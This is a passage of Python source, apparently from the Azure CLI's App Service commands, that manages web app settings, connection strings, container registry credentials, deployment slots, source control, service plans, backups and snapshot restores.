configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
# note: getargvalues is already used in azure.cli.core.commands,
# and there is no simple functional replacement for this deprecated method on Python 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
result = {}
for s in generic_configurations:
try:
result.update(get_json_object(s))
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
setattr(configs, config_name, value)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform == 'win32'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
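# Illustrative output shape of _build_app_settings_output (hypothetical names/values; a sketch, not executed here):
#   [{'name': 'WEBSITE_NODE_DEFAULT_VERSION', 'value': '10.14', 'slotSetting': False},
#    {'name': 'SCM_DO_BUILD_DURING_DEPLOYMENT', 'value': 'true', 'slotSetting': True}]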
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings | --slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
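# Illustrative call to update_connection_strings above (hypothetical connection string; a sketch, not executed here):
#   update_connection_strings(cmd, 'my-rg', 'my-app', 'SQLAzure',
#                             settings=["MyDb='Server=tcp:myserver.database.windows.net;Database=mydb'"])
# The value is split from the name at the first '=' and the surrounding quotes are stripped before storing.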
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Both --multicontainer-config-file and --multicontainer-config-type must be specified to update the multicontainer configuration')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
HostNameBinding = cmd.get_models('HostNameBinding')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
# the logic here is ported from the portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
site_config = get_site_configs(cmd, resource_group_name, webapp, None)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
# if it is a Windows Container site, at least pass the necessary
# app settings to perform the container image validation:
if configuration_source and site_config.windows_fx_version:
# get settings from the source
clone_from_prod = configuration_source.lower() == webapp.lower()
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings', src_slot)
settings = []
for k, v in app_settings.properties.items():
if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
"DOCKER_REGISTRY_SERVER_URL"):
settings.append(NameValuePair(name=k, value=v))
slot_def.site_config = SiteConfig(app_settings=settings)
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.create_or_update_slot(resource_group_name, name, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone the app settings and connection strings over, so we do it here;
# also make sure slot-specific settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
webapp_list = None if test is None else list_webapp(cmd, resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
try:
status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
except RuntimeError as ex:
raise CLIError(ex)
logger.warning(status.status_message)
return status
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
        raise CLIError('The following parameters are of no use when cd_project_url is None: ' +
                       'cd_app_type, app_working_dir, nodejs_task_runner, python_framework, ' +
                       'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
            # for non-server errors (not 50x), just throw; otherwise retry up to 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
    Update the source control token cached in Azure App Service. If no token is provided,
    the command will clear the existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
SiteConfigResource = cmd.get_models('SiteConfigResource')
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location=location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
_validate_asp_sku(app_service_environment, sku)
if is_linux and hyper_v:
raise CLIError('usage error: --is-linux | --hyper-v')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
            raise CLIError('Windows containers are not yet supported in an App Service Environment')
ase_id = _validate_app_service_environment_id(cmd.cli_ctx, app_service_environment, resource_group_name)
ase_def = HostingEnvironmentProfile(id=ase_id)
ase_list = client.app_service_environments.list()
ase_found = False
for ase in ase_list:
if ase.id.lower() == ase_id.lower():
location = ase.location
ase_found = True
break
if not ase_found:
raise CLIError("App service environment '{}' not found in subscription.".format(ase_id))
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
return sdk_no_wait(no_wait, client.app_service_plans.create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
        logger.warning('No update was made. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except DefaultErrorResponseException:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
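    '''
    Return a single-element list with a DatabaseBackupSetting when all three database
    arguments are provided, raise if only some of them are, and return None otherwise.
    '''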
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
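    ''' Parse a frequency string such as '7d' or '12h' into (interval, FrequencyUnit) '''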
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
    if frequency_num <= 0:
        raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_location_from_resource_group(cli_ctx, resource_group_name):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
    webapp_instance = client.web_apps.get(resource_group_name, webapp)
    if not webapp_instance:
        raise CLIError("'{}' app doesn't exist".format(webapp))
    return webapp_instance.location
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
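    ''' Build the local git URL, i.e. <scheme>://<publishing user>@<scm host>/<app name>.git '''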
user = client.get_publishing_user()
